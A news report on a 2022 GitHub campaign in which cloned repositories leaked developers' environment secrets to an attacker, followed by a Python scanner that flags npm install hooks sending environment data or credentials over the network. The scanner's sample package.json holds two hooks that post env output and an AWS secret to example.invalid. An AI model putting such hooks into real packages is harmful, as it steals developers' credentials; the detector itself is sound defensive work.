September 30, 2022


Major developer platform GitHub faced a widespread malware attack and reported 35,000 “code hits” on a day when thousands of Solana (SOL)-based wallets were sold for millions of dollars.

The widespread attack was highlighted by GitHub developer Stephen Lucy, who first reported the incident earlier Wednesday. The developer encountered the problem while reviewing a project he found in a Google search.

So far, various projects from crypto, Golang, Python, JavaScript, Bash, Docker and Kubernetes have been found to be affected by the attack. The malware targets Docker images, install docs and the npm script, which is a convenient way to group common shell commands for a project.

To trick developers and gain access to critical data, the attacker first creates a fake repository (a repository contains all project files and each file’s revision history) and pushes clones of legitimate projects to GitHub. For example, the following two screenshots show this legitimate crypto miner project and its clone.

[Screenshot: Original crypto mining project. Source: GitHub]
[Screenshot: Cloned crypto mining project. Source: GitHub]

Many of these clone repositories were pushed as “pull requests”. Pull requests allow developers to notify others of changes they’ve pushed to a branch in a repository on GitHub.


Once the developer falls victim to the malware attack, the entire environment (ENV) of the script, application or laptop is sent to the attacker’s server. ENV includes security keys, AWS access keys, encryption keys and more.
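The vector described above is an npm script that dumps the environment and sends it to a remote host. The following is an added example, not code from the report or from GitHub, that scans the `scripts` section of a `package.json` for that pattern before a developer runs `npm install`; the package.json content and the `example.invalid` host are constructed, and the regexes are a heuristic, not a complete detector.

```python
import json
import re

# Constructed sample package.json (not from any real repository): two benign
# scripts and two install-time hooks that ship environment data off-host.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-app",
    "scripts": {
        "build": "tsc -p .",
        "test": "jest",
        "postinstall": "env | curl -X POST -d @- http://example.invalid/collect",
        "prepare": "curl -d \"$AWS_SECRET_ACCESS_KEY\" http://example.invalid/k",
    },
})

# Commands that dump the whole process environment.
ENV_DUMP = re.compile(r"(^|[\s;&|(])(env|printenv|set)(\s|$)")
# References to variables whose names suggest credentials.
SECRET_REF = re.compile(r"\$\{?[A-Z0-9_]*(KEY|SECRET|TOKEN|PASS)[A-Z0-9_]*\}?")
# Tools that send data over the network.
NETWORK_SEND = re.compile(r"(^|[\s;&|(])(curl|wget|nc|ncat)\b")
# Lifecycle hooks npm runs automatically during `npm install`.
AUTO_HOOKS = {"preinstall", "install", "postinstall", "prepare"}


def suspicious_scripts(package_json_text):
    """Return (script_name, reason) pairs for scripts that look like env exfiltration."""
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for name, cmd in scripts.items():
        dumps_env = bool(ENV_DUMP.search(cmd))
        reads_secret = bool(SECRET_REF.search(cmd))
        sends = bool(NETWORK_SEND.search(cmd))
        if not sends or not (dumps_env or reads_secret):
            continue
        what = "environment dump" if dumps_env else "credential variable"
        reason = f"sends {what} over the network"
        if name in AUTO_HOOKS:
            reason += " from an install-time hook"
        findings.append((name, reason))
    return findings


if __name__ == "__main__":
    for script, why in suspicious_scripts(SAMPLE_PACKAGE_JSON):
        print(f"{script}: {why}")
```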

The developer has reported the issue to GitHub and advised developers to sign their revisions to the repository. GPG keys add an extra layer of security to GitHub accounts and software projects by providing a way to verify that all revisions come from a trusted source.